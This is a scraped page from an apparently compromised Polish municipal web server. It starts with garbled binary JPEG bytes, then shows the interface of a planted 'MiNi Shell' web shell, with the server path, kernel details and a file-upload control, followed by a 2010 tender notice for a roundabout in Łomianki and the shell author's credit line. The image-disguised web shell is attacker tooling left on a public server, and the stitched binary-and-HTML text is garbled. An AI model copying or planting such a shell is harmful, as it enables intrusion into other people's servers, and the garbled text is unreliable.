JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/10297-N-2010.html

<p class="kh_header"><b>Łomianki: Przebudowa ul. Brukowej  z przedłużeniem w kierunku ulicy  Trenów w zakresie rozbudowy  skrzyżowania dróg gminnych ulic: Brukowej i ul. Warszawskiej w Łomiankach  na rondo.</b><br>
<b>Numer ogłoszenia: 10297 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łomianki , ul. Warszawska 115, 05-092 Łomianki, woj. mazowieckie, tel. 0-22 7686302, faks 0-22 7686302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Brukowej  z przedłużeniem w kierunku ulicy  Trenów w zakresie rozbudowy  skrzyżowania dróg gminnych ulic: Brukowej i ul. Warszawskiej w Łomiankach  na rondo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na rozbudowie skrzyżowania dróg gminnych ulic Brukowej i Warszawskiej w Łomiankach na rondo. Prace polegają na: wykonaniu prac drogowych wraz 
z towarzyszącą infrastrukturą (oświetlenie, kanalizacja deszczowa),likwidacją kolizji z istniejącymi urządzeniami infrastruktury technicznej. Rozbudowa skrzyżowania ulic Brukowej i Warszawskiej polega na wykonaniu ronda czterowlotowego z dodatkowym pasem ruchu dla pojazdów skręcających
 z ul. Warszawskiej w ulicę Brukową oraz przebudowie ulic: Brukowej i Warszawskiej. W miejscu istniejącego skrzyżowania zwykłego należy wykonać rondo małe o średnicy zewnętrznej 38 m i średnicy wyspy środkowej 23 m. Szerokość pasa ruchu wraz z pierścieniem (2,5 m) z kostki kamiennej wynosi 7,5 m. Pierścień ronda zaprojektowano z kostki kamiennej o grubości 10 cm. W projekcie przyjęto zamknięty system odwodnienia drogi.. Kolektor zbiorczy realizowany będzie w pierwszej kolejności przez innego wykonawcę wg oddzielnego opracowania na który jest ostateczne pozwolenie na budowę. Przed przystąpieniem 
do wykonywania odwodnienia drogi niezbędne jest skoordynowanie działań z wykonawcą kolektora zbiorczego. Szczegóły przedstawiono w odpowiednich projektach branżowych.. Zamawiający dokona odbioru robót w terminie 14 dni od daty otrzymania zgłoszenia przez Wykonawcę gotowości do odbioru, przy czym 
za termin wykonania robót należy przyjąć: wykonanie robót objętych zakresem umownym wraz 
z przekazaniem dokumentacji powykonawczej i inwentaryzacji geodezyjnej powykonawczej oraz uzyskaniem decyzji - pozwolenia na użytkowanie. Faktury  będą wystawiane nie częściej  niż 1  raz w miesiącu oddzielnie na każdy z zakresów  na podstawie  podpisanych przez obie strony bezusterkowych częściowych  protokołów zdawczo- odbiorczych. Gwarancja 36 miesięcy od daty protokolarnego koncowego odbioru  robót.
Termin płatności wynagrodzenia - 14 dni od daty otrzymania faktury VAT.
Na podstawie art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie w formie aneksu w szczególności:
1)	w przypadku uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia zaproponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, 
2)	w przypadku zmian przepisów prawa oraz wydanych  do  nich aktów wykonawczych  powiązanych
z ustawą Pzp lub  przepisami związanymi z przedmiotem zamówienia.
3)	w przypadku wystąpienia niekorzystnych warunków atmosferycznych  uniemożliwiających  wykonanie przedmiotu  umowy  w terminie określonym  w niniejszej SIWZ, potwierdzonych przez Zamawiającego,
4)	w przypadku wstrzymania robót  lub przerw  powstałych  z przyczyn  leżących po stronie Zamawiającego,
5)	w przypadku zmiany dokumentacji  projektowej lub/ i  specyfikacji technicznych,
6)	w przypadku  wystąpienia  okoliczności, których  strony   umowy  nie były  w stanie przewidzieć, pomimo  zachowania  należytej  staranności.
Ewentualne przesunięcie terminu zakończenia robót nastąpi o tyle dni, przez ile trwały przyczyny, o których mowa powyżej, przy czym wymagają one potwierdzenia przez Przedstawiciela Zamawiającego stosownym wpisem do Dziennika Budowy.
Wszelkie ewentualne zmiany będą dokonane w formie aneksu i nie będą stanowić podstawy do zwiększenia wynagrodzenia z wyjątkiem  pkt. 2..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.10.00-5, 45.31.16.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości 68 000,00 zł (sześćdziesiąt osiem tysięcy złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, określone w art. 22 ust.1  oraz art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych dotyczące:
1.	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
2.	posiadania wiedzy i doświadczenia; 
3.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
4.	sytuacji ekonomicznej i finansowej. 
5.	nie podlegają  wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Pzp.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokona wg formuły
spełnia / nie spełnia w oparciu o informacje zawarte w  złożonych przez Wykonawcę dokumentach
i oświadczeniach, stanowiących integralną część złożonej oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Pzp oraz zgodnie z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. 
w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form,
w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817) Zamawiający żąda:

a.	Wykazu robót budowlanych w którym Wykonawca przedstawi wykonanie  minimum jednego zamówienia  polegającego na wykonaniu robót budowlanych w zakresie budowy nawierzchni dróg wraz z przebudową infrastruktury towarzyszącej: oświetlenia, wodociągów, kanalizacji deszczowej, sieci gazowych o wartości minimum 2 800 000,00 zł brutto, wykonanej w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem jej rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona;

	
b.	Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia (wraz z zawartą informacją o podstawie do dysponowania osobami wskazanymi  w Wykazie), w którym Wykonawca przedstawi osoby  posiadające uprawnienia budowlane do  kierowania  robotami  budowlanymi  w specjalności:
-	drogowej - 1 osoba,
-	instalacyjnej w zakresie sieci, instalacji   i urządzeń, gazowych - 1 osoba,
-	 instalacyjnej w zakresie sieci, instalacji i urządzeń sanitarnych (sieci wodociągowe  i kanalizacyjne) - 1 osoba,
-	 instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. - 1 osoba, 
Do wykazu należy dołączyć:
-	dokumenty potwierdzające posiadanie  uprawnień dla osób wskazanych w Wykazie,
-	aktualne  dokumenty (zaświadczenia)  potwierdzające  przynależność osób wskazanych
w Wykazie   do Okręgowej Izby Inżynierów Budownictwa,

c.	Oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1.

2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp oraz zgodnie
z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817)  Zamawiający żąda:

a.	Oświadczenia o braku podstaw do wykluczenia,

b.	Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy Pzp tj; Wykonawców, w stosunku do których nie otwarto likwidacji lub których upadłość nie ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego; 

3.	Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp,
a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w punkcie 2 - żądanych w celu wykazania braku podstaw wykluczenia.
 
a.	Ponadto w powyższej sytuacji Zamawiający żąda od Wykonawcy udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia,
w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, oraz  w przypadku Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej osoby,
o których mowa w art. 24 ust. 1 pkt. 5-8 ustawy Pzp mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodne z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817). 

5.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać,
że łącznie spełniają warunki określone powyżej.

6.	W przypadku Wykonawców występujących wspólnie należy załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o zamówienie publiczne albo do reprezentowania 
w postępowaniu i zawarcia umowy o zamówienie publiczne..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lomianki.pl (bip).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek w siedzibie Zamawiającego, pokój nr 1 w pon. godz. 10:00-18:00, wt.-pt. godz. 8:00 - 16:00 lub drogą pocztową - cena 250,00 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2010 godzina 12:00, miejsce: Urząd Miejski w Łomiankach ul. Warszawska 115, 
05-092 Łomianki, pok. nr 1,.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com